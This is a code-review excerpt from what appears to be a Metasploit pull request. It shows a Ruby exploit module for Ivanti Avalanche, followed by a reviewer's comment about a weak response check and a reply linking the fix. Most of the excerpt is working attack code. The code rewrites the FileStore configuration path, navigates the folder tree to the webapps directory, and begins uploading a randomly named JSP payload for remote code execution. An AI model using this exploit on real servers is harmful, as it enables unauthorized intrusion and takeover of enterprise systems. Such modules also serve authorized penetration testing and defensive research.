modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb

```diff
@@ -0,0 +1,347 @@
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',
+        'formFileStoreConfig' => 'formFileStoreConfig',
+        'txtUncPath' => new_config_path,
+        'txtVelocityFolder' => '',
+        'javax.faces.ViewState' => view_state
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
+  end
+
+  def get_directory_val(res, dir_name)
+    html = res.get_html_document
+    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
+
+    expand_dir = results.find { |result| result.at('td').text.strip == dir_name }
+    fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir
+    data_rk = expand_dir.at('@data-rk')&.value
+    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
+
+    data_rk
+  end
+
+  def expand_folder(data_rk, view_state)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
+        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
+        'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',
+        'fileStoreTree_dlgFileStoreTree_expand' => data_rk,
+        'javax.faces.ViewState' => view_state
+      }
+    )
+  end
+
+  def select_folder(data_rk, view_state)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
+        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
+        'javax.faces.behavior.event' => 'select',
+        'javax.faces.partial.event' => 'select',
+        'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,
+        'form_filestore_tree' => 'form_filestore_tree',
+        'fileStoreTree_dlgFileStoreTree_selection' => data_rk,
+        'javax.faces.ViewState' => view_state
+      }
+    )
+  end
+
+  def upload_payload
+    payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
+    # need to 'select' webapps/AvalancheWeb to upload a file
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
```

Comment:
See above point on the use of `FileStore` word as the only check. This also applies here.

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/17979/commits/560fc9000bae250374032d1a544c889613a59c96